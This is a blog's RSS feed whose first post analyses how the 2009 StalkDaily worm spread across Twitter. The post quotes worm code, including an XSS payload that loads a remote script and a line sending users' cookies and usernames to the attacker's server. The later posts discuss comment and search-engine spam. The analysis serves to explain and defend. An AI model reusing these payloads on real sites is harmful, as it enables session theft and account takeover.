<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>unitstep.net &#187; spam</title>
	<atom:link href="http://unitstep.net/blog/category/spam/feed/" rel="self" type="application/rss+xml" />
	<link>http://unitstep.net</link>
	<description>the home of peter chng</description>
	<lastBuildDate>Mon, 06 Feb 2012 01:23:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>How the Twitter StalkDaily Worm spread so fast</title>
		<link>http://unitstep.net/blog/2009/04/13/how-the-twitter-stalkdaily-worm-spread-so-fast/</link>
		<comments>http://unitstep.net/blog/2009/04/13/how-the-twitter-stalkdaily-worm-spread-so-fast/#comments</comments>
		<pubDate>Tue, 14 Apr 2009 03:50:40 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[social networking]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[web2.0]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[worm]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://unitstep.net/?p=847</guid>
		<description><![CDATA[If you use Twitter a lot (unlike me) you&#8217;ll likely have been alerted and worried about the presence of a worm that&#8217;s been making the rounds at the popular micro-blogging website. The so-called &#8220;StalkDaily&#8221; worm was first noticed on Saturday, and it appeared to be able to &#8220;infect&#8221; a user&#8217;s Twitter profile, causing random tweets [...]]]></description>
			<content:encoded><![CDATA[<p class="image align-right"><img src="http://unitstep.net/wordpress/wp-content/uploads/2009/04/biohazard.jpg" alt="biohazard" title="biohazard" width="100" height="145" class="alignnone size-full wp-image-853" /></p>
<p>If you use Twitter a lot (unlike me) you&#8217;ll likely have been alerted and worried about the <a href="http://www.techcrunch.com/2009/04/11/twitter-hit-by-stalkdaily-worm/">presence of a worm that&#8217;s been making the rounds</a> at the popular micro-blogging website.  The so-called &#8220;StalkDaily&#8221; worm was first noticed on Saturday, and it appeared to be able to &#8220;infect&#8221; a user&#8217;s Twitter profile, causing random tweets about the StalkDaily website (<strong>don&#8217;t go there</strong>)  to show up on their profile.  Furthermore, other user&#8217;s Twitter profiles could also become infected, seemingly by <strong>only viewing the profile of another infected user</strong>.</p>
<p>Eventually the <a href="http://gist.github.com/93782">source code of the worm was uncovered</a>, (safe to view) and a quick analysis of the worm shows why it was able to quickly spread through Twitter so fast.  Here&#8217;s an overview of how the worm worked.</p>
<h2>Overview</h2>
<p>The StalkDaily worm was apparently <a href="http://adjix.com/af5t">written by a person named &#8220;Mikeyy Mooney&#8221;</a>, who is evidently a 17-year old from Brooklyn, New York.  He created the original worm, plus other derivatives that spread using the same mechanism but displayed different messages on the infected user&#8217;s profile.  The attack was not able to steal user&#8217;s passwords, thanks to Twitter&#8217;s security configuration, but <a href="http://www.cbc.ca/technology/story/2009/04/13/twitter-worm.html">it nonetheless caused over 10,000 unauthorized tweets</a> to show up on users&#8217; profiles.</p>
<h2>Drilling down</h2>
<p>An analysis of the <a href="http://gist.github.com/93782">source code of the worm</a> yields some insight into how this malicious code was able to spread so effectively.  Specifically, the attack used <a href="http://en.wikipedia.org/wiki/Cross-site_scripting#Persistent">Type 2 or persistent XSS vulnerability</a>, the most serious type, in order to achieve DOM/JavaScript injection into the Twitter site.</p>
<p>In this sort of attack, the attacker was able to arbitrary JavaScript into a page that was publicly viewable by any other user; in this case the page was a user&#8217;s profile.  This injected JavaScript was then used to &#8220;infect&#8221; the profile of the user who viewed the already-infected profile, causing the cycle to repeat.</p>
<p>Specifically, the &#8220;<acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym>&#8221; field of the user&#8217;s profile is targeted.  This contents of this field were apparently not sanitized from user input, or the contents were not properly converted to <acronym class="uttInitialism" title="HyperText Markup Language">HTML</acronym> entities when setting the contents to the value of the <code>href</code> attribute when displaying the user&#8217;s <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym> or homepage/website.  This is seen in lines 104 and 109 of the source code, shown below:</p>
<pre><code>var xss = urlencode('http://www.stalkdaily.com"&gt;</a>&lt;script src="http://mikeyylolz.uuuq.com/x.js"&gt;&lt;/script&gt;&lt;a ');
...
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&amp;user[url]="+xss+"&amp;tab=home&amp;update=update");</code></pre>
<p>The last line is where the user&#8217;s profile is updated to show the offending JavaScript; this essentially make the user&#8217;s profile execute the worm&#8217;s source code, causing anyone who views the profile to become &#8220;infected&#8221; themselves.</p>
<p>Thus the attacker was able to exploit this to arbitrarily inject a SCRIPT tag into the DOM linking to a JavaScript file (<code>x.js</code>) on his site.  By doing this, he was able to get code he owned (the JavaScript file on his own website) to run at the privilege level of scripts on the Twitter.com domain.  This &#8220;privilege escalation&#8221; of sorts is what allowed the script to perform actions on behalf of the user, including infecting their profile to spread to others, and causing the user to tweet phrases of the attacker&#8217;s choice.</p>
<h2>Spreading</h2>
<p>Once infected, a user&#8217;s profile would contain a link to the malicious JavaScript as described above.  This is because the user&#8217;s profile shows a link to their website <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym>, which had been altered to inject the malicious JavaScript residing the attacker&#8217;s server.  Because of this, <strong>anyone who was logged into Twitter and viewed an infected user&#8217;s profile would themselves be infected</strong>, and their profile would then become a vector for transmission of the worm, completing the cycle. </p>
<p>The source code also shows that each time you viewed an infected profile, the script would cause you to randomly tweet one of six different phrases, all of which linked to the StalkDaily website.  It appears the <a href="http://adjix.com/b52w">attacker was trying to promote his website this way</a>, but it&#8217;s also possible that going to this website could also cause you to become infected.  While viewing a resource directly on the StalkDaily website could not cause you to become infected, due to the same-origin policy, it&#8217;s possible that a hidden <code>iframe</code> could be included on the site, pointing towards the profile of an infected user.  This would case you to become infected.</p>
<h2>Why XSS is so important to prevent against</h2>
<p>Cross-site scripting attacks, or XSS for short, essentially occur because user-input data is not properly sanitized prior to being committed to persistent storage, or is not properly escaped into <acronym class="uttInitialism" title="HyperText Markup Language">HTML</acronym> entities before being output to a webpage or displayed.  This can allow a malicious user to inject or alter the structure of the DOM, inserting <code>script</code> tags to inject their own arbitrary JavaScript into your website.</p>
<p>This attack demonstrates the need to effectively guard against these vulnerabilities, because such flaws can undermine other security precautions you have taken.  For example, the source code of the worm shows that Twitter was using an &#8220;authentication token&#8221; for all form submissions in order to prevent <a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">Cross-site Request Forgery (CSRF) attacks</a>.  This is essentially using a temporary, random value to ensure that a form was submitted from the Twitter website itself, so that not any website can submit a form request to Twitter on behalf of a user.</p>
<p>This can normally prevent malicious websites from performing actions on your behalf without your knowledge; however because the XSS vulnerability allowed for DOM/script injection, the attacker&#8217;s script (on a separate domain) was able to run with the same privilege of a script on Twitter&#8217;s own site.  Thus, it was able to read in the &#8220;authentication token&#8221; value from the <acronym class="uttInitialism" title="HyperText Markup Language">HTML</acronym> of the Twitter webpage, and use it to properly craft form submission data to alter the user&#8217;s profile and tweet on their behalf.  This is seen on lines 85-90:</p>
<pre><code>var content = document.documentElement.innerHTML;

authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);</code></pre>
<p>Note that using a cookie to store the authentication token would not have prevented this.  Because the script was running within the scope of the Tiwtter.com domain, it would be able to access the user&#8217;s cookies!  In fact it does exactly this, and furthermore it sends your cookies to the attacker&#8217;s server so they can keep a log of them! Lines 78-81 show this: (The username is obtained from the DOM, much like the authentication token)</p>
<pre><code>var cookie;
cookie = urlencode(document.cookie);
document.write("&lt;img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&amp;username=" + username + "'&gt;");
document.write("&lt;img src='http://stalkdaily.com/log.gif'&gt;");</code></pre>
<h2>Other notes</h2>
<p>Obviously central to this problem is the ability of scripts on other domains to run within the scope of another domain simply by being linked to on the page via a <code>script</code> element.  This allows scripts not under the control of the originating domain to be able to access cookies and other information that would not be normally accessible.  </p>
<p>However, this ability also allows useful services such as Google Analytics and other third-party services/APIs such as Google Maps, to work easily across different websites, allowing services to expose their features through a JavaScript API.  Thus, making browsers reject third-party SCRIPT tags would cause serious usability problems; a better idea is to use a Firefox plugin like <a href="https://addons.mozilla.org/en-US/firefox/addon/722">NoScript</a> so that the user can have fine-grained control over issues like this. </p>
<p>Other points of interest when looking at the source code is that the bulk of the code are utility functions.  The actual malicious code only takes up the last third of the file or so.  For example, the function <code>XHConn()</code> is simply a standard cross-browser compatible implementation of <a href="http://en.wikipedia.org/wiki/XMLHttpRequest">XMLHttpRequest</a>, the API used for the Ajax requests necessary to alter the user&#8217;s profile.  Additionally, the <code>urlencode()</code> function is another utility function that allows values like the user&#8217;s cookies and the actual malicious <code>script</code> tag to be properly submitted in the Ajax request.</p>
<p>Lastly, the malicious code is set to be executed 3250 ms after the script is fully-loaded. (line 111)  This is likely to ensure that the DOM is fully loaded and ready to be traversed to find things like the username and authentication token, instead of hooking into an event like <code>window.onload</code>.</p>
<h2>Concluding remarks</h2>
<p>This analysis identifies the following points:</p>
<ol>
<li>The worm spreads by updating your profile <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym> to include the malicious script.</li>
<li>Simply viewing the profile of an infected user is suffice to cause your profile to become infected.</li>
<li>Every time you view the profile of an infected user, including your own, the worm will cause you to automatically tweet one of the random messages.</li>
<li>The random tweets from an infected user <strong>do not</strong> appear to contain the malicious code, probably because output here has been protected against that.</li>
<li>The worm steals the cookies you have set for the Twitter.com domain, along with your username, but thankfully no password information is stolen since Twitter does not store that sort of information in cookies.  It also appears to log each visit to an infected user&#8217;s profile.</li>
<li>Visiting a third-party site (such as the StalkDaily website) may infect your Twitter profile if a hidden iframe has been included, pointing towards the profile of an infected user.  This can be hard to detect, so using something the <a href="https://addons.mozilla.org/en-US/firefox/addon/722">NoScript Firefox extension</a> is recommended.</li>
</ol>
<p>Note that this is not a criticism of Twitter itself, as designing any web application is  difficult from a security perspective; it&#8217;s also worthwhile to note that Twitter responded fast to this issue, within hours on a Saturday.  They appeared to have the <a href="http://blog.twitter.com/2009/04/wily-weekend-worms.html">situation under control as of yesterday</a> and had patched the hole as well as being on their way to cleaning up infected users&#8217; profiles.  Understandably they are very upset and I hope they are able to sort the whole issue out.</p>
<hr/>Copyright &copy; 2012 <strong><a href="http://unitstep.net">unitstep.net</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact <strong><a href="mailto:webmaster@unitstep.net">webmaster@unitstep.net</a></strong> for more information.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/">Plugin</a> by <a href="http://www.taragana.com/">Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2009/04/13/how-the-twitter-stalkdaily-worm-spread-so-fast/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Passing the 100,000 mark</title>
		<link>http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/</link>
		<comments>http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/#comments</comments>
		<pubDate>Sun, 13 Jan 2008 02:10:16 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[akismet]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/</guid>
		<description><![CDATA[This week, Akismet reported that it had blocked its 100,000th spam comment on my site/blog. While that&#8217;s not a remarkable number, in light of how little traffic my site gets that figure becomes somewhat more significant. Since this site has only been around for just over one and a half years (19 months), that works [...]]]></description>
			<content:encoded><![CDATA[<p>This week, <a href="http://akismet.com/">Akismet</a> reported that it had blocked its 100,000th spam comment on my site/blog.  While that&#8217;s not a remarkable number, in light of how little traffic my site gets that figure becomes somewhat more significant.  Since this site has only been around for just over one and a half years (19 months), that works out to roughly 5200 spam comments every month, or a little over 1300 every week.  Note that the current averages are actually much higher since in the beginning I got a lot less spam before the bots discovered my site.</p>
<p>Props definitely go out to <a href="http://automattic.com/">Automattic</a> for creating such a reliable and accurate service.  When I <a href="/blog/2006/07/31/comment-spam-evolution/">first wrote about it</a> over a year ago, I was very impressed with its precise filtering of spam and non-spam (aka <dfn>ham</dfn>) comments along with its unobtrusiveness.  Akismet truly makes spam filtering transparent to the end user, unlike other methods such as CAPTCHAs.</p>
<p>Of course, I can&#8217;t forget thanking the developers of <a href="http://wordpress.org/">WordPress</a> as well.  Without them, I would have no site from which I&#8217;d have to protect from spam. <img src='http://unitstep.net/wordpress/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Check back later when this site surpasses the 1,000,000 mark for spam.</p>
<hr/>Copyright &copy; 2012 <strong><a href="http://unitstep.net">unitstep.net</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact <strong><a href="mailto:webmaster@unitstep.net">webmaster@unitstep.net</a></strong> for more information.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/">Plugin</a> by <a href="http://www.taragana.com/">Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Akismet problems</title>
		<link>http://unitstep.net/blog/2006/08/27/akismet-problems/</link>
		<comments>http://unitstep.net/blog/2006/08/27/akismet-problems/#comments</comments>
		<pubDate>Sun, 27 Aug 2006 15:23:48 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[akismet]]></category>
		<category><![CDATA[comment spam]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://unitstep.net/blog/2006/08/27/akismet-problems/</guid>
		<description><![CDATA[I&#8217;ve been using Akismet to control comment spam and so far, it&#8217;s performance has been excellent &#8211; out of close to 300 comments, it didn&#8217;t report a single false positive and only let through one or two cleverly-crafted comments. However, for some reason, in the past day it&#8217;s started letting through comments that are clearly [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been using <a href="">Akismet</a> to control <a href="http://unitstep.net/blog/2006/07/31/comment-spam-evolution/">comment spam</a> and so far, it&#8217;s performance has been excellent &#8211; out of close to 300 comments, it didn&#8217;t report a single false positive and only let through one or two cleverly-crafted comments.  However, for some reason, in the past day it&#8217;s started letting through comments that are clearly spam, and I&#8217;ve had to manually label them as such and then delete them.</p>
<p>I wonder if this is related to the <a href="http://akismet.com/blog/2006/08/better-stats/">recent update</a> to the system (as it&#8217;s a centralized service), or something else.  The update seemed to be only related to improving the statistics tracking of the service, and not something related to the spam-detection algorithm.  I&#8217;ve tried disabling/enabling the plugin, so we&#8217;ll see if that helps &#8211; has anyone else been having these problems?</p>
<hr/>Copyright &copy; 2012 <strong><a href="http://unitstep.net">unitstep.net</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact <strong><a href="mailto:webmaster@unitstep.net">webmaster@unitstep.net</a></strong> for more information.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/">Plugin</a> by <a href="http://www.taragana.com/">Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2006/08/27/akismet-problems/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Comment spam evolution</title>
		<link>http://unitstep.net/blog/2006/07/31/comment-spam-evolution/</link>
		<comments>http://unitstep.net/blog/2006/07/31/comment-spam-evolution/#comments</comments>
		<pubDate>Tue, 01 Aug 2006 01:54:42 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://unitstep.net/blog/2006/07/31/comment-spam-evolution/</guid>
		<description><![CDATA[Spam is pervasive; it is everywhere. If Ben Franklin were alive today, he&#8217;d probably be quoted as saying that &#8220;In this world nothing is certain but death and spam&#8220;. In fact, it&#8217;s one of the major downsides of the web as we know it. With increased availability of information, comes the inevitability of spam &#8211; [...]]]></description>
			<content:encoded><![CDATA[<p>Spam is pervasive; it is everywhere.  If Ben Franklin were alive today, he&#8217;d probably be <a href="http://www.brainyquote.com/quotes/authors/b/benjamin_franklin.html">quoted</a> as saying that <em>&#8220;In this world nothing is certain but death and <strong>spam</strong>&#8220;</em>. In fact, it&#8217;s one of the major downsides of the web as we know it.  With increased availability of information, comes the inevitability of spam &#8211; direct consumer marketing thrown in alongside legitimate content that decreases the  SNR (Signal-to-noise Ratio), effectively making it harder to find quality, real information on the Internet. </p>
<h3>In the old days&#8230;</h3>
<p>Back a few years ago, the big thing was e-mail spam.  It&#8217;s been around so long that almost anyone who&#8217;s used e-mail knows about it.  All those e-mails telling you how to re-finance your mortgage, get low-cost prescription drugs or how to grow a certain appendage longer tended to fill up one&#8217;s inbox, making it a pain to delete all of them and find the real e-mail that you needed to read.  </p>
<p>For those of you thinking that e-mail spam was big annoyance, <a href="http://www.dmnews.com/cms/dm-news/internet-marketing/35135.html">recent polls</a> have shown that people apparently do make purchases from spam e-mails, making it a viable direct marketing tactic.  However, server-side e-mail spam filters have greatly increased in their ability to weed out junk e-mails in the past few years, so for many people, spam is not as big of a problem as it once was.  Unless, you&#8217;re <a href="http://unitstep.net/blog/2006/07/26/windows-live-mail-slow-bloated-and-not-very-usable/">using Hotmail</a>.</p>
<h3>Adapt or die</h3>
<p>Faced with the prospect of decreased income thanks to e-mail spam filters (or just wanting to make more money), spammers began a new front in the war of direct marketing.  They began to spam forums, guestbooks and most recently, commenting systems on various systems in the hopes of drawing attention to the products they were advertising.  The purpose was the same &#8211; to encourage people to buy products, mostly the same ones they had been sending out in mass e-mails.  So, while e-mail spam has not gone away in recent times, alternative forms of spam have increased many times.  </p>
<p>In fact, spamming online communites with message may even be more effective, since a spammer needs only to get their message on one site in order for it to be viewed by many.  However, since spam tended to be easy to distinguish from comments posted by humans, it was relatively easy for developers to combat this by building in anti-spam features to weed out spam.  Spammers responded by making their &#8220;bots&#8221; &#8211; the automated programs that sent out the spam messages &#8211; better and trying to make the &#8220;quality&#8221; of their messages seem more &#8220;human&#8221;.</p>
<h3>A personal experience</h3>
<p>My site, <a href="http://unitstep.net">unitstep.net</a>, is far from a popular site.  However, spam bots have still managed to find this site and I&#8217;ve logged 104 spam comments in just over two months&#8217; worth of operation.  That&#8217;s quite impressive, and shows that spammers are actively searching for new blogs to spam.  As <a href="http://unitstep.net/blog/2006/06/19/search-engine-spam/">I mentioned before</a>, some comment spam is aimed at promoting other websites in order to increase their ranking in SERPS (Search Engine Results Pages), thus drawing unsuspecting visitors to their sites, where they are served up advertising that looks like regular content.  (WordPress and most blogs add an attribute of <code>rel="nofollow"</code> to comment links to defeat this, but they still try.)  Most of the spam I&#8217;ve got, has been of the direct marketing variety, though.</p>
<p>If you haven&#8217;t seen the comment spam though, it&#8217;s because of <a href="http://akismet.com/">Akismet</a>, a truly kick-ass plugin for WordPress, written by the same team.  It basically uses a central authority to check on every comment that&#8217;s submitted, and analyzes its content to determine if its likely to be spam, or likely to be real.  Comments that are marked as spam aren&#8217;t shown, and are instead put in a moderation queue, for me to look at and delete or, if it&#8217;s a false positive, allow it through.  Akismet appears to learn as well, so it&#8217;s success rate increases the longer it&#8217;s been in use.  I apparently joined relatively late in the game, as I have yet to find Akismet report a false positive or let a spam comment through. </p>
<p>Until today.</p>
<p>However, I don&#8217;t blame Akismet for this one, as I was almost caught off guard.  Here was the content of the comment:</p>
<blockquote><p>Plato learningâ€¦</p>
<p>I am Karin, very interesting article that contained the information I was searching for in Google, thanksâ€¦.</p></blockquote>
<p>Upon closer inspection, the comment does look like a spammer&#8217;s, since it didn&#8217;t specifically relate to the post&#8217;s topic, instead using a generalized statement.  The first sentence also made no sense.  But, what threw me off was the lack of links in the post &#8211; the spam bot had just instead used the regular &#8220;homepage&#8221; field to fill in the <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym> of their spam blog &#8211; or splog &#8211; in the hopes that someone would visit it.</p>
<p>In fact, due to my curiousity, I had to visit the site to see what was on it.  (This was, of course, how I determined it to be a splog) The splog consisted of a load of nonsensical posts, and of course, lots of ads, by Google no less.  Since it&#8217;s against the terms-of-service of Google Adsense to make a site <em>for the direct purpose of displaying Google ads</em>, this spammer is obviously in clear violate of the program.  The spam blog wasn&#8217;t littered with links though (besides the ads), and the posts would look human after only a quick check &#8211; a closer inspection reveals sentences merged together into nonsensical, run-on paragraphs.</p>
<h3>The Turing test</h3>
<p>All of the efforts by current spammers reminded me of the <a href="http://en.wikipedia.org/wiki/Turing_Test">Turing Test</a>.  Basically, it&#8217;s a concept that if a person communicating with a computer cannot reliably tell if they are communicating with a computer or a human, then that computer system is said to have passed the test.  Turing thought it was a better way of evaluating a computer over the question of &#8220;Can a computer think?&#8221;</p>
<p>In a way, spam and anti-spam techiques are engaged in some sort of Turing test. Except that it&#8217;s a computer system (the anti-spam system) that is trying to determine if an entity is a computer (spambot) or a real human.  The anti-spam techniques described above have typically been widely used, along with <a href="http://en.wikipedia.org/wiki/Captcha">CAPTCHAs</a> or other &#8220;tests&#8221; that the typical human can easily do, but are relatively hard to design into a computer program or system.</p>
<p>However, as programming techniques and algorithms advance, the spam/anti-spam war is sure to heat up.  As seen by some of the comment spam I&#8217;ve started to get, spammers are getting better with the bots they produce.  They&#8217;re moving away from posting messages that are heavily-laden with links to gambling/porn sites that are obviously spam, to posting messages that could have conceivably come from a human, with only the regular home page link that any curious visitor might click.  As these techiques advance, it&#8217;s entirely possible that a spam bot could read a blog post, analyze the content, and post a reasonably-specific message that contained a few links here and there to spam sites.  The same goes for CAPTCHAs as well &#8211; advances in image processing are making optical character recognition more and more accurate.</p>
<p>The end result is, as I mentioned at the beginning, a lower SNR and lower quality of information on the web.  Not only will more useless spam information be disseminated, making it more likely to find crap rather than helpful information when doing a search &#8211; but it&#8217;ll also be harder to post actual information that isn&#8217;t incorrectly labelled as spam.  For example, if spam bots were able to post vaguly post-specific comments to sites, then quick remarks by people, such as <em>&#8220;Thanks for the useful information!&#8221;</em>, might also get labelled as spam.  Same goes for CAPTCHAs &#8211; if we make the images more distorted and the characters harder to read, people might also have trouble &#8211; I know I do on some of them &#8211; and this creates another problem of accessibility for the disabled.</p>
<p>This isn&#8217;t to say I&#8217;ve lost hope.  Akismet, so far, has only missed one comment &#8211; and I would have missed it had I not visited the linked site.  So, it hasn&#8217;t really let me down.  Others have had <a href="http://www.darcynorman.net/2006/06/24/20-000-spam-attempts-per-day-and-counting">similar success</a>, so for now, I think anti-spam techniques have the upper hand.  Spam is merely an annoyance and a statistic currently, and I hope it stays that way.  What I&#8217;ve talked about in this entry could be viewed as a <a href="http://unitstep.net/blog/2006/07/22/black-dawn-the-next-pandemic-or-bird-flu-the-worst-case/">worse case scenario</a> of sorts.</p>
<p>Now, excuse me while I press &#8220;Delete All&#8221; on the spam comment moderation queue.</p>
<hr/>Copyright &copy; 2012 <strong><a href="http://unitstep.net">unitstep.net</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact <strong><a href="mailto:webmaster@unitstep.net">webmaster@unitstep.net</a></strong> for more information.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/">Plugin</a> by <a href="http://www.taragana.com/">Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2006/07/31/comment-spam-evolution/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Search engine spam</title>
		<link>http://unitstep.net/blog/2006/06/19/search-engine-spam/</link>
		<comments>http://unitstep.net/blog/2006/06/19/search-engine-spam/#comments</comments>
		<pubDate>Tue, 20 Jun 2006 02:42:43 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[google]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.unitstep.net/blog/2006/06/19/search-engine-spam/</guid>
		<description><![CDATA[I recently read about how Google was the latest victim of search engine spam, or the intentional creation of useless pages in order to get a high ranking or listing on a search engine results page. The story was later Dugg, and you may have seen it on my &#8220;Recently visited&#8221; list. While Google has [...]]]></description>
			<content:encoded><![CDATA[<p>I recently <a href="http://googlesystem.blogspot.com/2006/06/billions-of-spam-pages-indexed-by.html">read about</a> how Google was the latest victim of search engine spam, or the intentional creation of useless pages in order to get a high ranking or listing on a search engine results page.  The story was later <a href="http://digg.com/technology/How_One_Spammer_Got_BILLIONS_of_Pages_into_Google_in_3_Weeks">Dugg</a>, and you may have seen it on my &#8220;Recently visited&#8221; list.  While Google has fixed this current problem, this type of Internet spam has been growing at a very fast pace for the past few years, for a few reasons, and will probably out-grow conventional e-mail spam in the future.  It presents its own set of unique problems, many of which have yet to be solved by Google, or, in my opinion, other search engines as well.</p>
<p>
During this latest round of spamming, which reached its peak this weekend, it appears that well over 5 billion spam pages were indexed by Google; while this by itself is a huge number, taken in context with the total number of pages that Google had indexed at the time, around 25 billion by the source in the first link, it is simply astonishing.  What&#8217;s even more impressive, or scary, is the fact that the site was started only less than a month ago, making this intrusion into the Google search indexes not only massive, but frighteningly fast as well.
</p>
<p>
From reading the posts at Digg, and from the <a href="http://merged.ca/monetize/flat/how-to-get-billions-of-pages-indexed-by-Google.html">resultant link</a>, it appears the spammer used a script in order to serve up articles based on keywords, and furthermore, utilized many topical subdomains in order to generate the content that would appear &#8220;high&#8221; on the keywords list, and thus be indexed by Google.  Comment-spam (on forums, blogs, and the like) may or may not have played a role in getting the pages ranked higher, but one thing is for certain &#8211; these useless pages made it <em>very</em> high onto the search results page, in many cases filling multiple spots in the top 10 results.  These searchs were for common terms, such as &#8220;war on terror pros cons&#8221; and &#8220;pizza sauce recipe&#8221;.
</p>
<p>
But what&#8217;s the reason for this? Well, the same as for any spam marketing campaign &#8211; advertising.  Because of the currently huge market for Internet advertising, the potential for making lots of money of ads on popular sites is an opportunity many cannot turn down.  You&#8217;re likely to see these somewhat unobtrusive text ads on most any popular site nowadays &#8211; in fact it was Google who first popularized them as a replacement for the annoying animated graphic banner ads and popups, which put off many viewers.  This form of advertising is, undoubtedly, the backbone of many web 2.0 companies.  Companies like <a href="http://digg.com">Digg</a>, <a href="http://flickr.com">Flickr</a> and even <a href="http://google.com">Google</a> rely on ads for nearly 100% of their revenue.
</p>
<p>
But this potential has turned many to the dark side of advertising &#8211; creating spam sites whose sole purpose is to attract viewers for increased ad viewing.  While successful web 2.0 companies may display ads on their site, they all offer some useful service that people return for.  These spam sites do not offer any useful service or information, but instead manipulate search engine results in order to trick users to visiting their site.  Once there, the user will find only semi-meaningful information laced intricately laced with ads, or perhaps, no information and only ads.  While this clearly violates many ad providers terms-of-service (such as Google Adwords), most sites have no problem doing this or finding marketers who don&#8217;t care about such trivial things.
</p>
<p>
This is perhaps the other side of the double-edged sword that is the Internet.  On the one hand, forums, blogs, and other community-based sites offer the immensive capacity for spreading useful information.  On the other hand, they also offer the ability to spread <em>useless</em> information as well, and in some cases, search engines cannot yet discriminate between the two as most humans would.  This can be seen in the huge amounts of comment spam, and spam blogs that pervade the Internet.
</p>
<p>
All of this creates problems on many levels, and in many ways, is more damaging that e-mail spam.  While e-mail spam is annoying for the junk it creates in our inboxes, and the extra bandwidth it consumes, for the most part anti-spam tools have helped curb this influx.  However, search engine spam targets the most basic use of the Internet, and that is the ability to find useful information.  With all the spam sites out there, and the manipulation of search engine results that comes from this, the ability to conduct a search that returns useful information may be compromised in the future if proper countermeasures are not employed.
</p>
<p>
Furthermore, it creates a nightmare for the people who engineer the search engines, as they must find a way to tweak the algorithms to prevent this from happening again.  In the process, false positives may be generated, causing legitimate sites to be unintentionally delisted, causing futher headaches.  Google has been having <a href="http://www.sitepoint.com/forums/showthread.php?t=388258">delisting problems</a> as of late, and one wonders if this is related to the recent spamming problem.
</p>
<p>
One also has to wonder how many of these problems may have come as a result of the upgrade Google did to its datacenters, <a href="http://en.wikipedia.org/wiki/Big_Daddy_Google">dubbed &#8220;Big Daddy&#8221;</a>.  Google did not seem to have these sorts of problems before this, so perhaps there is a correlation, but maybe not a cause.  It&#8217;s interesting to note, however, that the aim of the &#8220;Big Daddy&#8221; updates was to <em>prevent</em> this sort of thing &#8211; and to keeping meaningful sites in the index, which is exactly the opposite of what happened, since the spamming from these sites evidently bumped out important sites from the indexes.
</p>
<p>
